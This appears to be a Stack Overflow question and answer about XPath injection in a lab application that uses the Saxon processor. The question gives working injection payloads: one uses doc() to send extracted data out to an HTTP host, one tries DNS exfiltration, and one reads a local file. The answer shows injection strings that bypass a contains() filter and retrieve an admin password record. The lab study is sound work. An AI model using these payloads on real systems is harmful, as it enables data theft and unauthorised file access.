# xpath injections and doc() function

Tags: xpath, xpath-2.0

I'm trying to understand how to use the doc() function of xpath in several ways to carry out xpath injections

Lab's query:

```
 String xquery = "/root/books/book[contains(title/text(), '" + query + "')]";
```

I can use both versions 2.0 and 3.0

I'm able to extract data and export it through HTTP, for example:

```
test') and doc((concat('http://IP/data/?d=',(encode-for-uri((normalize-space((/*[1]/*[2]/*[2]/@*[2]))))))))/data=220248 and string('1'='1
```

But i'm not able to:

- Extract data and export it through DNS requests:

  *test') and doc((concat(name((/*[2])) , 'domain.com'))) and string('1'='1* -> it does not give any error, but nothing happens ( i don't know why stackoverflow strips the * from /*[2] )
- Read a local xml file ( file's permissions are fine )

  *test') and doc('file:///home/lubuntu/test.xml')/text() and string('1'='1* -> it says file not found, when it is clearly there..

What is wrong in my payloads?

@updates

xpath processor: net.sf.saxon

os: Linux lubuntu 4.18.0-17-generic #18~18.04.1-Ubuntu

JAVA_HOME=/usr/local/openjdk-11

JAVA_VERSION=11.0.9.1

LANG=C.UTF-8

@about the file reading: problem solved. the lab was running inside of a docker

@about the data exfiltration via dns requests, i still can't figure it out why nothing happens. I tried also basic injection like doc((concat('ABCTEST', '.domain.com' ))) and string('1'='1 but still nothing happens..

Comment: You need to tell us a lot more about what XPath processor you are using, what environment you are running it in, and how it is configured.

Comment: As @MichaelKay said, we need more information, but I tried to provide a meaningful example based on the `contains()` function.

Comment: @DimitreNovatchev First of all, thanks for your interest in helping me guys! I updated the infos!

Answer (score 1):

It is difficult to understand what exactly you are trying to achieve.

Here is a simple example of XPath injection in XSLT/XPath 3.0 using as a base the fact that:

```
contains($anyString), '') eq true()
```

**Xml document**:

```
<x>
  <root>
    <books>
      <book>
        <title>Book1</title>
      </book>
      <book>
        <title>Book2</title>
      </book>
      <book>
        <title>Book3</title>
      </book>
    </books>
  </root>
</x>
```

**XSLT stylesheet**:

```
<xsl:stylesheet version="3.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:output omit-xml-declaration="yes" indent="yes"/>
  
  <xsl:template match="/">
    <xsl:variable name="query">'</xsl:variable>
    <xsl:variable name="vXpath1">/x/root/books/book[contains(title/text(), '</xsl:variable>
    <xsl:variable name="vXpath2" select="$vXpath1 || $query || ')]'"/>
    <xsl:evaluate xpath="$vXpath2" context-item="/" />
  </xsl:template>
</xsl:stylesheet>
```

**and finally, the result of applying the transformation on the Xml document**:

```
<book>
   <title>Book1</title>
</book>
<book>
   <title>Book2</title>
</book>
<book>
   <title>Book3</title>
</book>
```

**Explanation**:
We were able to get all `<book>` elements of the document and not only one of them that contains a particular string (the password :) ) in its `<title>`

---

**Update**
Here is another example:

we have a slightly different XML document:

```
<x>
  <root>
    <books>
      <book name="regular">
        <title>Book1 with password: regular</title>
      </book>
      <book name="admin">
        <title>Admin with password: SuperSecret</title>
      </book>
      <book name="maintainer">
        <title>Book3 with password: maintainer</title>
      </book>
    </books>
  </root>
</x>
```

**And the transformation now is** (only $query is changed):

```
<xsl:stylesheet version="3.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:output omit-xml-declaration="yes" indent="yes"/>
  
  <xsl:template match="/">
    <xsl:variable name="query">') and @name eq "admin" and true(</xsl:variable>
    <xsl:variable name="vXpath1">/x/root/books/book[contains(title/text(), '</xsl:variable>
    <xsl:variable name="vXpath2" select="$vXpath1 || $query || ')]'"/>
    <xsl:evaluate xpath="$vXpath2" context-item="/" />
  </xsl:template>
</xsl:stylesheet>
```

**Now the result is that we get exactly the `<book>` element with the desired name `"admin"`**:

```
<book name="admin">
   <title>Admin with password: SuperSecret</title>
</book>
```

Comment: Thanks for the examples! But i did not have any problem about the extracting data part, the first thing i would like to understand is why i can't read a local .xml file

Comment: Some browsers explicitly prohibit this.

Comment: it is the server that tries to read the local .xml file, not the browser. I'm talking always about the doc() function